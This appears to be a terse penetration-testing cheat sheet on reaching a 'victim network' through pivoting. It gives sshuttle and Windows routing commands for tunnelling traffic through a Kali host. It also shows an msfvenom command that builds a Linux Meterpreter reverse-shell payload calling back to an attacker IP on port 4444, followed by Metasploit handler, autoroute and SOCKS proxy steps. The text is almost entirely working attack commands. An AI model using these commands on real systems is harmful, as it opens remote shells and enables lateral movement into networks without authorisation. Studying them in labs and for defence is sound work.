Accessing a Victim network from Windows box which is pivoted to Kali #On Kali sshuttle --listen 0.0.0.0 -r user@10.10.10.10 192.168.1.0/24 #On windows route print #delete default route route delete 0.0.0.0 #add a new route to kali- setting kali ip as gateway; kali_ip=which is on the same subnet as the windows box route add 0.0.0.0 mask 0.0.0.0 KALI_IP #Now you should be able to access all the sites which are accessible on kali from windows box. #to revert the changes; 192.168.206.2 route delete 0.0.0.0 route add 0.0.0.0 mask 0.0.0.0 VMWare_Gateway Get a Meterpreter on the Target and add a route to attacker machine msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.14.14.3 LPORT=4444 -f elf -o rev msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 10.14.14.3 set LPORT 4444 run background sessions -i use post/multi/manage/autoroute set SUBNET 192.168.125.0 set SESSION 4 run use auxiliary/server/socks_proxy set SRVPORT 1060 run ...
Way to Divergence